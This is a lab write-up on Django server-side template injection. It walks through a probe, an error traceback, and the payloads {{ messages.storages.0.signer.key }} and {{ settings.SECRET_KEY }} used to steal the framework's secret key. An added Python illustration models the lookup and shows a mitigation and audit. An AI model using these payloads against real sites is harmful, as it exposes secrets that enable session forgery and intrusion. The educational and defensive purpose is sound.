SSTI with Information Disclosure via User-Supplied Objects
Lab
Server-side template injection with information disclosure via user-supplied objects · Expert
Solution
Given
This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.
To solve the lab, steal and submit the framework's secret key.
You can log in to your own account using the following credentials:
Analyzing the task
There's a site vulnerable to SSTI. We've been given a user who, apparently, can edit templates for the template engine. We need to prepare a payload that lets us steal the framework's secret key, and inject that payload into a template.
Recon
Let's log in as the user and see what's there.
We go into any product — there's an "edit template" button.
There's a textarea — let's throw in the payload {{7*'7'}}.
Traceback (most recent call last):
File "<string>", line 11, in <module>
File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 191, in __init__
self.nodelist = self.compile_nodelist()
File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 230, in compile_nodelist
return parser.parse()
File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 486, in parse
raise self.error(token, e)
django.template.exceptions.TemplateSyntaxError: Could not parse the remainder: '*'7'' from '7*'7''
Aha: the traceback comes from django/template/base.py, so this is the Django template engine.
Exploitation
Let's go to PayloadsAllTheThings and find the Django section. HackTricks, incidentally, has nothing on it.
{{ messages.storages.0.signer.key }}
Empty.
Ah, the payload turns out to be simpler:
{{ settings.SECRET_KEY }}
Lab solved!
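To see why a payload as short as {{ settings.SECRET_KEY }} works once an object is handed into the template context, and what the fix looks like, here is an added illustration that is not part of the lab, the write-up or Django itself. It models Django's dotted variable resolution in a simplified way (mapping key, then attribute, then integer index) over a constructed context; the Settings and Product classes, the placeholder secret and the allow-lists are all assumptions made for the example.

```python
"""Why a rich object in a user-editable template context leaks settings,
and how to scope the context instead.

Added illustration, not Django's own code: a simplified model of how a
Django-style template variable such as 'a.b.0.c' is resolved, applied to a
constructed context.  Settings, Product and the secret are placeholders."""
import re
from dataclasses import dataclass, field


@dataclass
class Settings:
    SECRET_KEY: str = "PLACEHOLDER-constructed-secret"  # constructed, not a real key
    DEBUG: bool = False


@dataclass
class Product:
    name: str
    price: int
    # The dangerous part: the object handed to the template carries a
    # reference to the settings object, so dotted lookups can reach it.
    settings: Settings = field(default_factory=Settings)


def resolve(context, dotted):
    """Walk a dotted name the way a Django-style variable lookup does:
    mapping lookup first, then attribute access, then integer index.
    Returns None when any step fails."""
    current = context
    for bit in dotted.split("."):
        try:
            current = current[bit]                 # dict-style lookup
        except (TypeError, KeyError, AttributeError):
            try:
                current = getattr(current, bit)    # attribute lookup
            except AttributeError:
                try:
                    current = current[int(bit)]    # list index, e.g. storages.0
                except (IndexError, ValueError, KeyError, TypeError):
                    return None
    return current


VAR_RE = re.compile(r"{{\s*([\w.]+)\s*}}")


def render(template_text, context):
    """Minimal {{ var }} substitution built on resolve(); no tags or filters."""
    def substitute(match):
        value = resolve(context, match.group(1))
        return "" if value is None else str(value)
    return VAR_RE.sub(substitute, template_text)


def safe_context(product, allowed=("name", "price")):
    """Mitigation: expose only allow-listed scalar fields of the object,
    never the object itself, so no lookup path leads back to settings."""
    return {key: getattr(product, key) for key in allowed}


def audit_template(template_text, allowed_roots=("product",)):
    """Defensive pre-check for user-submitted template text: every variable
    reference whose root is not an allow-listed context key is reported."""
    return [ref for ref in VAR_RE.findall(template_text)
            if ref.split(".")[0] not in allowed_roots]


if __name__ == "__main__":
    product = Product("Widget", 5)
    # Vulnerable: the whole object is in the context, so the secret is reachable.
    print(render("{{ product.settings.SECRET_KEY }}", {"product": product}))
    # Hardened: only scalars are in the context, the same lookup yields nothing.
    print(repr(render("{{ product.settings.SECRET_KEY }}",
                      {"product": safe_context(product)})))
    print(audit_template("{{ product.name }} {{ settings.SECRET_KEY }}"))
```

The audit only catches references whose root is not an expected context key; a lookup that starts from an allowed object and traverses into settings passes it, which is why the context must also be reduced to scalars as safe_context does. In real Django the robust fix is not to render user-controlled template text with the full engine at all.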